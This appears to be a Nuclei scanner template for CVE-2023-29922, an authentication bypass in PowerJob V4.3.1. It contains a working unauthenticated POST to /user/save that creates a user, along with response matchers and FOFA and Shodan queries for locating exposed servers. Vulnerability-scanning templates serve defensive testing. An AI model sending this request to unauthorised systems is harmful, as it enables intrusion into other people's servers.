id: CVE-2023-29922 info: name: PowerJob V4.3.1 - Authentication Bypass author: Co5mos severity: high description: | PowerJob V4.3.1 is vulnerable to Incorrect Access Control via the create user/save interface. reference: - https://github.com/PowerJob/PowerJob/issues/585 - https://nvd.nist.gov/vuln/detail/CVE-2023-29922 classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:L cvss-score: 8.9 cve-id: CVE-2023-29922 cwe-id: CWE-1188 metadata: max-request: 1 verified: true fofa-query: app="PowerJob" shodan-query: html:"PowerJob" tags: cve,cve2023,auth-bypass,powerjob variables: str: "{{rand_base(6)}}" http: - raw: - | POST /user/save HTTP/1.1 Host: {{Hostname}} Content-Type: application/json {"username":"{{str}}","phone":"{{str}}","email":"{{str}}","webHook":"{{str}}"} matchers-condition: and matchers: - type: word part: body words: - '"success":true' - '"data":null' condition: and - type: word part: header words: - "application/json" - type: status status: - 200